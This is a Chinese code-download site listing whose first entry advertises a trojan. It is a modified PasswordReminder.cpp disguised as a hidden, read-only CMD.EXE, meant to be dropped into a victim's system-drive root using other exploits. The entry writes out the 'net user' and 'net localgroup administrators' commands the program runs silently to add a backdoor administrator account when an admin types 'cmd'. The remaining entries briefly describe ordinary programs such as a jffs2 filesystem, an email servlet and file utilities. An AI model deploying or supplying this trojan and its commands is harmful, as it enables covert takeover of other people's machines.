你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-12
上传用户:qlpqlq
uclinux的jffs2文件系统
上传时间: 2014-11-30
上传用户:lmeeworm
http协议下的文件传输程序
上传时间: 2015-01-12
上传用户:784533221
VC编写的读取数据文件的源码
上传时间: 2014-01-08
上传用户:ywqaxiwang
1:文件说明: ExampleServlet.java 发信JAVA源文件 CSEmail.jar 发信包 com CSEmail.jar 的源文件 2:部署: ExampleServlet.java 发到 WEB-INF/CLASSES/ CSEmail.jar 放到 web-inf/lib/ 3. 修改ExampleServlet.java 中 private String SERVLET_HTTP_PATH = "http://www.yourSite.com/servlet/ 把www.yourSite.com 改成你的网址 4运行: http://www.yourSite.com/servlet/ExampleServlet 填写你的SMTP邮件服务器和发信端口,还有你在这个邮件服务器上的帐号(不正确发不出信)
标签: ExampleServlet CSEmail java jar
上传时间: 2015-01-12
上传用户:cx111111
此文件用于实现生产者消费者的问题
标签:
上传时间: 2014-09-01
上传用户:zhangliming420
对文件进行处理。 包括文件复制、分割、连接、查看等。
上传时间: 2015-01-12
上传用户:牛布牛
驱动程序中的文件读写。
上传时间: 2015-01-12
上传用户:tianjinfan
ASP站长助手 v4.0 功能增强版 站内文件在线管理功能,无组件上传功能,可操作MSSQL数据库和Access数据库。包括浏览数据和添加,删除,修改数据,建立数据表,修改数据库等,非select命令提供一个SQL输入框给大家输入SQL指令来执行
上传时间: 2015-01-12
上传用户:www240697738
这是一个加密文件的程序,
上传时间: 2015-01-12
上传用户:himbly